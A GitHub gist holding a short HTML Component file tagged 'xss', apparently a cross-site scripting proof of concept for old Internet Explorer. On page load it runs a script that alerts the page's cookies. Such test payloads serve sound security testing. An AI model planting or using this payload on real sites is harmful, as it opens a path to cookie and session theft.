Last active
October 12, 2018 22:25
-
-
Save dlh3/c29127d790c38f2f246a7bb9da4ca8c9 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<PUBLIC:COMPONENT TAGNAME="xss"> | |
<PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> | |
</PUBLIC:COMPONENT> | |
<SCRIPT> | |
function main() | |
{ | |
alert("HTC script executed.\n" + document.cookie); | |
} | |
</SCRIPT> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment